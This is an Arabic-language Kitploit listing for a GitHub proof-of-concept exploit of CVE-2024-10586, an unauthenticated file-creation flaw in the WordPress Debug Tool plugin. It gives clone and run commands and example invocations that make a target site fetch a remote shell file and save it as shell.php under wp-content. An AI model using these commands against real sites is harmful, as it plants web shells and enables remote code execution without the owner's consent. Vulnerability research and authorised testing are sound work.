Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-10586-Poc — استغلال إثبات المفهوم لـ CVE-2024-10586 يستهدف إضافة WordPress Debug Tool. يقوم بأتمتة تحميل الملفات التعسفي مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد عبر طلبات POST غير مصادق عليها. | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-10586-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

استغلال إثبات المفهوم لـ CVE-2024-10586 يستهدف إضافة WordPress Debug Tool. يقوم بأتمتة تحميل الملفات التعسفي مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد عبر طلبات POST غير مصادق عليها.

عرض المستودع
10منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

معلومات الثغرة الأمنية

الوصف إضافة Debug Tool لووردبريس معرضة لإنشاء ملفات عشوائية بسبب عدم وجود فحص للصلاحية في الدالة dbt_pull_image() وعدم التحقق من نوع الملف في جميع الإصدارات حتى 2.2.
هذا يتيح للمهاجمين غير الموثوقين إنشاء ملفات عشوائية مثل ملفات .php التي يمكن استخدامها لتنفيذ أكواد عن بُعد.

معرف CVE

CVE-2024-10586

استخدام السكربت

المتطلبات الأساسية

  • تثبيت Python 3.x على نظامك.
  • تثبيت التبعيات المطلوبة: pip install requests

كيفية التشغيل

  1. استنساخ المستودع من GitHub:
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. تشغيل السكربت باستخدام الأمر التالي: python CVE-2024-10586.py -u -r -p

المعاملات

  • -u, --url: عنوان URL الأساسي لموقع ووردبريس (مثال: http://example.com/wordpress).
  • -r, --remote: عنوان URL للملف البعيد لاستخدامه كمصدر للحمولة.
  • -p, --path: اختياري. المسار الذي سيتم حفظ الشيل فيه. القيمة الافتراضية هي /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

مثال على الأمر

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

مثال على الاستخدام

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

إخلاء مسؤولية

هذا السكربت لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.

تنزيل الأداة